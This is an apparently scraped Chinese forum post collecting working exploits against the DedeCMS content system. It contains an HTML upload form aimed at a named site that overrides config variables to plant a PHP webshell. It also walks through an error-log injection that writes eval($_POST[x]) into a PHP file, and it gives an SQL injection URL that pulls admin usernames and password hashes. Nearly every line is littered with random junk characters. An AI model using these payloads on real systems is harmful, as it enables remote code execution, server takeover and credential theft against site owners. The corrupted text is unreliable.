<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>/ s7 N- a$ `+ f, E; p
</head>
* P/ M c: u$ w4 L8 S# b<body style="FONT-SIZE: 9pt">
' E; y* H8 y+ e" X/ T) v+ W, i---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />0 _. U5 D; @8 M) n2 W
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
, i" {7 A2 x: i7 b& k<input type='hidden' name='activepath' value='/data/cache/' />9 `* ^' r$ M/ {1 k+ j/ o
<input type='hidden' name='cfg_basedir' value='../../' />
7 N) i5 C, r$ g6 o# W- Z/ Y<input type='hidden' name='cfg_imgtype' value='php' />
4 t, T" G! r7 F0 @) E% J' b( K7 Q<input type='hidden' name='cfg_not_allowall' value='txt' />; T0 [, p# v( P9 R4 h
<input type='hidden' name='cfg_softtype' value='php' />
$ t" }% O: o. i R$ F<input type='hidden' name='cfg_mediatype' value='php' />4 E7 A9 @- w( V% X
<input type='hidden' name='f' value='form1.enclosure' />% ^1 }2 F. C9 }0 o& k* y4 i9 _
<input type='hidden' name='job' value='upload' />( {2 O, f# s. {( a. y
<input type='hidden' name='newname' value='fly.php' />
& R1 Y. i- @( v$ k7 X$ eSelect U Shell <input type='file' name='uploadfile' size='25' />
4 H8 Q- Z# S6 E4 t<input type='submit' name='sb1' value='确定' />* v) ^9 M' E% e8 f* }' n3 _
</form>
$ L$ u k7 w# H7 N2 ~<br />It's just a exp for the bug of Dedecms V55...<br />
" [6 T( {( E: rNeed register_globals = on...<br />" e3 b! r1 C& k3 L( s
Fun the game,get a webshell at /data/cache/fly.php...<br />( m$ c( I+ S" c$ R1 r8 a \2 ^
</body>
+ `; h3 A) V @7 W. F" u" r</html>
8 q5 q& ^; U, r$ I% m
' G, ^6 d, P; T/ }+ G9 F o/ q ?4 f) y( i+ L8 r7 y; c
& U7 W8 \& H8 W6 d& I6 x1 x" }$ l
3 y+ [: F$ ~5 o2 l" ^
+ e$ `; k' o$ D8 |! m" L; w1 i5 w$ q) g% u( S- T5 v; g F
. I2 u8 D! C O& N9 `% U3 }& l7 e4 r2 m
( m. z( C4 [0 z& t3 x. d s
# w8 z7 z1 M5 Y% {1 u织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
; f! ~$ R- x: K0 i2 a( r利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。- S. |# Y) D, s4 \+ b" ]$ p7 Y: }
1. 访问网址:
5 h6 G5 Z0 l; x) y7 o, khttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
3 U" y8 N# Z. a- y# T可看见错误信息) d2 a. {& ~9 ~" M7 S. F7 z
1 n. U' q7 f+ ]& M6 U6 ~4 _
* A* y* d- s4 R+ w$ Y9 C
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
6 ^% G9 p: r3 E" ~' h8 A" m# @! |" |int(3) Error: Illegal double '1024e1024' value found during parsing
, I Q. G1 G$ OError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
+ _8 k) e. B( S; Q& P; A. ~ d, k2 [. Y' _. Z7 h7 A: r
1 U& @" e) \: |" {- {$ B
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是% t% |* n; q m8 j
' L9 Z- n: T! i& J; \
3 {% {; _/ [3 M1 @: u/ `+ c<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
" I0 c" ~7 [, h+ D: h8 h% ^2 v. f5 {( `0 E6 I
- V E9 t" d3 I7 C8 z w6 v
按确定后的看到第2步骤的信息表示文件木马上传成功.- Z: M1 a( Y' r2 _: k. ?4 ~
, a5 c1 [ f. u: N& j- b! T" A
) \9 T! |1 n+ e( H) G! m9 n
7 |* ~( Y. Q' ]
2 g6 R1 M8 B$ V: S/ w& j
! |1 _7 V0 Z1 e# z, n
. j0 c: j9 o% f L( G6 ]4 Z b, w2 u, P" N
1 @) ?2 M& Q' f2 ~7 N& j6 M' c
7 V2 \- `* A4 {. [& z# f x$ H- Z, N! X b: I) |6 {! q
8 i; G9 J* _3 ~ U; I) }7 x1 p: R0 @* S. p1 N O. g7 y
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
! U0 u: P. N- a% @http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对